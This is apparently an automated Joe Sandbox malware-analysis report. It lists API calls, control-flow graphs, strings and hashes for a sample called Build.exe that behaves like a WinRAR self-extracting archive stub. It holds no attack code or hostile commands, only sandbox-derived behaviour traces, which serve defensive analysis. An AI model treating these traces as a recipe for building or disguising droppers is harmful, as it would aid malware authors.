                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00B5C75D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                                                                                                • String ID: PNG
                                                                                                                                                                                • API String ID: 541704414-364855578
                                                                                                                                                                                • Opcode ID: 3e8fb285e5a4aab97092589e90502cdb4438cba5133e9633624742ba3b654c0c
                                                                                                                                                                                • Instruction ID: cbb010c4a543ee8b4c0be57371e3409788b522650f6bdee2a0aea5c376b10e24
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e8fb285e5a4aab97092589e90502cdb4438cba5133e9633624742ba3b654c0c
                                                                                                                                                                                • Instruction Fuzzy Hash: B7313A71600B02AFD7109F61EC88E1B7FE9EF49752B0405A9F91993661EF21DC89DFA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,CEEE5757), ref: 00B4F9CD
                                                                                                                                                                                  • Part of subcall function 00B4E208: _wcslen.LIBCMT ref: 00B4E210
                                                                                                                                                                                  • Part of subcall function 00B52663: _wcslen.LIBCMT ref: 00B52669
                                                                                                                                                                                  • Part of subcall function 00B53D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,CEEE5757,?,?,CEEE5757,00000001,00B4DA04,00000000,CEEE5757,?,0002043C,?,?), ref: 00B53D2C
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B4FD00
                                                                                                                                                                                • __fprintf_l.LIBCMT ref: 00B4FE50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
                                                                                                                                                                                • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                                                                                                                                • API String ID: 2646189078-285229759
                                                                                                                                                                                • Opcode ID: 15d205a9c1ffc8b4dded0c8fe25326dada0c391e6d86dec9523cd72e982908c6
                                                                                                                                                                                • Instruction ID: 269b4fe714e0dbf434f946d3900ffa54b007a1032c7c8341e3d1943f80d6823b
                                                                                                                                                                                • Opcode Fuzzy Hash: 15d205a9c1ffc8b4dded0c8fe25326dada0c391e6d86dec9523cd72e982908c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 1342057190065AABDF24EFA8C841BFE73F4FF14700F1445AAFA05AB281EB719A45CB54

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1055 b4c4a8-b4c4e3 call b61590 1058 b4c4e5-b4c4f0 FindFirstFileW 1055->1058 1059 b4c548-b4c551 FindNextFileW 1055->1059 1060 b4c563-b4c606 call b5268b call b4e27e call b53724 * 3 1058->1060 1062 b4c4f2-b4c507 call b4da1e 1058->1062 1059->1060 1061 b4c553-b4c561 GetLastError 1059->1061 1066 b4c60b-b4c62c call b610f9 1060->1066 1063 b4c53d-b4c543 1061->1063 1070 b4c522-b4c52b GetLastError 1062->1070 1071 b4c509-b4c520 FindFirstFileW 1062->1071 1063->1066 1074 b4c52d-b4c530 1070->1074 1075 b4c53b 1070->1075 1071->1060 1071->1070 1074->1075 1078 b4c532-b4c535 1074->1078 1075->1063 1078->1075 1080 b4c537-b4c539 1078->1080 1080->1063
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000), ref: 00B4C4E6
                                                                                                                                                                                  • Part of subcall function 00B4DA1E: _wcslen.LIBCMT ref: 00B4DA59
                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?), ref: 00B4C516
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000800,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A), ref: 00B4C522
                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?,00000000,?,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000), ref: 00B4C549
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00B4C555
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 42610566-0
                                                                                                                                                                                • Opcode ID: 73e814c69d40bf32b25509fdc461b21522835a068249c485c6e6a2a29774741e
                                                                                                                                                                                • Instruction ID: b045a7bfc0b154d30eed845b94827a115dc24788388e0588be66f85351a05e44
                                                                                                                                                                                • Opcode Fuzzy Hash: 73e814c69d40bf32b25509fdc461b21522835a068249c485c6e6a2a29774741e
                                                                                                                                                                                • Instruction Fuzzy Hash: A74184B15086459FC714DF24C8C1AEEF7E8FB58740F00095EF59AD3240DB34AA58DB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00B6A616,?,00B7F7B0,0000000C,00B6A76D,?,00000002,00000000), ref: 00B6A661
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00B6A616,?,00B7F7B0,0000000C,00B6A76D,?,00000002,00000000), ref: 00B6A668
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00B6A67A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: 5be0744502ba146f1f66653eefef0d54ab4a9f9d8dc9abc28b12679d5f26e030
                                                                                                                                                                                • Instruction ID: 7e590bde2dcd2b888525e9b915298cca780fd219cac4585ae490b84302dc20a8
                                                                                                                                                                                • Opcode Fuzzy Hash: 5be0744502ba146f1f66653eefef0d54ab4a9f9d8dc9abc28b12679d5f26e030
                                                                                                                                                                                • Instruction Fuzzy Hash: 75E0B631440608AFCF116F64DD49A583BAAEB42741F445464F809AB132DF3AED82CE95
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B41366: GetDlgItem.USER32(00000000,00003021), ref: 00B413AA
                                                                                                                                                                                  • Part of subcall function 00B41366: SetWindowTextW.USER32(00000000,00B765F4), ref: 00B413C0
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5DC06
                                                                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5DC24
                                                                                                                                                                                • IsDialogMessageW.USER32(?,?), ref: 00B5DC37
                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00B5DC45
                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00B5DC4F
                                                                                                                                                                                • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B5DC72
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B5DC95
                                                                                                                                                                                • GetDlgItem.USER32(?,00000068), ref: 00B5DCB8
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B5DCD3
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B765F4), ref: 00B5DCE6
                                                                                                                                                                                  • Part of subcall function 00B5F77B: _wcslen.LIBCMT ref: 00B5F7A5
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00B5DCED
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5DD4C
                                                                                                                                                                                  • Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13
                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 00B5DDAF
                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 00B5DDD7
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00B5DDF5
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5DE0D
                                                                                                                                                                                • GetLastError.KERNEL32(?,00000011), ref: 00B5DE3F
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 00B5DE92
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5DEC9
                                                                                                                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00B93482,00000200), ref: 00B5DF1D
                                                                                                                                                                                • GetCommandLineW.KERNEL32(?,?,?,?,00B93482,00000200), ref: 00B5DF33
                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00B93482,00000400,00000001,00000001,?,?,?,?,00B93482,00000200), ref: 00B5DF8A
                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00B5DFB2
                                                                                                                                                                                • Sleep.KERNEL32(00000064,?,?,?,?,00B93482,00000200), ref: 00B5DFFA
                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(?,?,0000421C,00B93482,00000400,?,?,?,?,00B93482,00000200), ref: 00B5E023
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00B93482,00000200), ref: 00B5E02C
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5E05F
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5E0BE
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000065,00B765F4), ref: 00B5E0D5
                                                                                                                                                                                • GetDlgItem.USER32(?,00000065), ref: 00B5E0DE
                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B5E0ED
                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B5E0FC
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5E1A9
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B5E1FF
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5E229
                                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000001,0003046F), ref: 00B5E273
                                                                                                                                                                                • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B5E28D
                                                                                                                                                                                • GetDlgItem.USER32(?,00000068), ref: 00B5E296
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B5E2AC
                                                                                                                                                                                • GetDlgItem.USER32(?,00000066), ref: 00B5E2C6
                                                                                                                                                                                • SetWindowTextW.USER32(00000000,00B9589A), ref: 00B5E2E8
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B5E348
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5E35B
                                                                                                                                                                                • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 00B5E3FE
                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00B5E4CC
                                                                                                                                                                                • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B5E50E
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B5E532
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                                                                • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                                                                • API String ID: 3247240745-555893226
                                                                                                                                                                                • Opcode ID: 5c69d3f0cba97304f660b4f60df9f35c1860f0a66ea6fafb72bc4758ef70a199
                                                                                                                                                                                • Instruction ID: 15c2274a80506c16972c60dbcd7493614f64ced9cc47de31afb2f32b4b2cfd46
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c69d3f0cba97304f660b4f60df9f35c1860f0a66ea6fafb72bc4758ef70a199
                                                                                                                                                                                • Instruction Fuzzy Hash: 5642C471944344AAEB35AB60DC8AFBE3BE8EB06B02F0445D5F914A71E1DF745B48CB21

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 273 b5290a-b52941 call b61590 GetModuleHandleW 276 b52943-b52953 GetProcAddress 273->276 277 b52999-b52bfa 273->277 280 b52955-b5296b 276->280 281 b5296d-b5297d GetProcAddress 276->281 278 b52c00-b52c0d call b69e7e 277->278 279 b52cda 277->279 282 b52cdc-b52d08 GetModuleFileNameW call b4e208 call b5268b 278->282 289 b52c13-b52c41 GetModuleFileNameW CreateFileW 278->289 279->282 280->281 281->277 284 b5297f-b52994 281->284 297 b52d0a-b52d16 call b4d076 282->297 284->277 292 b52c47-b52c53 SetFilePointer 289->292 293 b52ccc-b52cd8 CloseHandle 289->293 292->293 296 b52c55-b52c71 ReadFile 292->296 293->282 296->293 298 b52c73-b52c7f 296->298 305 b52d45-b52d6c call b4e27e GetFileAttributesW 297->305 306 b52d18-b52d23 call b528ab 297->306 300 b52c85-b52ca4 298->300 301 b52ede-b52ee3 call b613f9 298->301 303 b52cc1-b52cca call b523d6 300->303 303->293 312 b52ca6-b52cc0 call b528ab 303->312 315 b52d76 305->315 316 b52d6e-b52d72 305->316 306->305 318 b52d25-b52d35 306->318 312->303 320 b52d78-b52d7d 315->320 316->297 319 b52d74 316->319 324 b52d40-b52d43 318->324 319->320 322 b52db4-b52db6 320->322 323 b52d7f 320->323 326 b52ec3-b52edb call b610f9 322->326 327 b52dbc-b52dd3 call b4e252 call b4d076 322->327 325 b52d81-b52da8 call b4e27e GetFileAttributesW 323->325 324->305 324->316 335 b52db2 325->335 336 b52daa-b52dae 325->336 339 b52dd5-b52e36 call b528ab * 2 call b50597 call b44c00 call b50597 call b5c774 327->339 340 b52e3b-b52e6e call b44c00 AllocConsole 327->340 335->322 336->325 338 b52db0 336->338 338->322 346 b52ebb-b52ebd ExitProcess 339->346 345 b52e70-b52eb5 GetCurrentProcessId AttachConsole call b66433 GetStdHandle WriteConsoleW Sleep FreeConsole 340->345 340->346 345->346
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32 ref: 00B52937
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B52949
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B52973
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B52C1D
                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B52C37
                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B52C4B
                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,00007FFE,00B76F24,00000000), ref: 00B52C69
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00B52CCD
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B52CE6
                                                                                                                                                                                • CompareStringW.KERNEL32(00000400,00001001,00B76F70,?,DXGIDebug.dll,?,00B76F24,?,00000000,?,00000800), ref: 00B52D3A
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00B76F24,00000800,?,00000000,?,00000800), ref: 00B52D64
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00B52DA0
                                                                                                                                                                                  • Part of subcall function 00B528AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B528D4
                                                                                                                                                                                  • Part of subcall function 00B528AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B51309,Crypt32.dll,00000000,00B51383,00000200,?,00B51366,00000000,00000000,?), ref: 00B528F4
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B52E12
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B52E5E
                                                                                                                                                                                • AllocConsole.KERNEL32 ref: 00B52E66
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00B52E70
                                                                                                                                                                                • AttachConsole.KERNEL32(00000000), ref: 00B52E77
                                                                                                                                                                                • _wcslen.LIBCMT ref: 00B52E8C
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B52E9D
                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000), ref: 00B52EA4
                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 00B52EAF
                                                                                                                                                                                • FreeConsole.KERNEL32 ref: 00B52EB5
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00B52EBD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
                                                                                                                                                                                • String ID: <$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                                                • API String ID: 270162209-1156125387
                                                                                                                                                                                • Opcode ID: 709a3fe69fd6f7be9e71492eba2bc30f9f3bee81b15269e70be6aecb52e61de7
                                                                                                                                                                                • Instruction ID: d4a19e77f27f09737857ff46ba67f51b56d5f1e3a52fbbc42d21d298febec86a
                                                                                                                                                                                • Opcode Fuzzy Hash: 709a3fe69fd6f7be9e71492eba2bc30f9f3bee81b15269e70be6aecb52e61de7
                                                                                                                                                                                • Instruction Fuzzy Hash: E8D171B20497849FD7309F50D888B9FBBE8EB85305F50899DF5AD9B251CFB08548CB62

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B5D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D875
                                                                                                                                                                                  • Part of subcall function 00B5D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D886
                                                                                                                                                                                  • Part of subcall function 00B5D864: IsDialogMessageW.USER32(0002043C,?), ref: 00B5D89A
                                                                                                                                                                                  • Part of subcall function 00B5D864: TranslateMessage.USER32(?), ref: 00B5D8A8
                                                                                                                                                                                  • Part of subcall function 00B5D864: DispatchMessageW.USER32(?), ref: 00B5D8B2
                                                                                                                                                                                • GetDlgItem.USER32(00000068,00BA3CF0), ref: 00B5F81F
                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,00B5D099,00000001,?,?,00B5DAB9,00B782F0,00BA3CF0,00BA3CF0,00001000,00B850C4,00000000,?), ref: 00B5F844
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B5F853
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B765F4), ref: 00B5F861
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B5F87B
                                                                                                                                                                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B5F895
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B5F8D9
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B5F8E4
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B5F8F7
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B5F91E
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000C2,00000000,00B7769C), ref: 00B5F92D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                • String ID: \
                                                                                                                                                                                • API String ID: 3569833718-2967466578
                                                                                                                                                                                • Opcode ID: 879c629f60e4213a317e67fc3d76487d6e96ac2417be6fc73b444daa4ff627f0
                                                                                                                                                                                • Instruction ID: 45fb41dc3a577d8b4824f7b0eab87719401fc55ea6d0a66b893da8586006eb71
                                                                                                                                                                                • Opcode Fuzzy Hash: 879c629f60e4213a317e67fc3d76487d6e96ac2417be6fc73b444daa4ff627f0
                                                                                                                                                                                • Instruction Fuzzy Hash: A631D2B1289704AFE310DF24DC46F6B7BE8EB46704F04095EF5A1AB2A1CF6059088B66

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
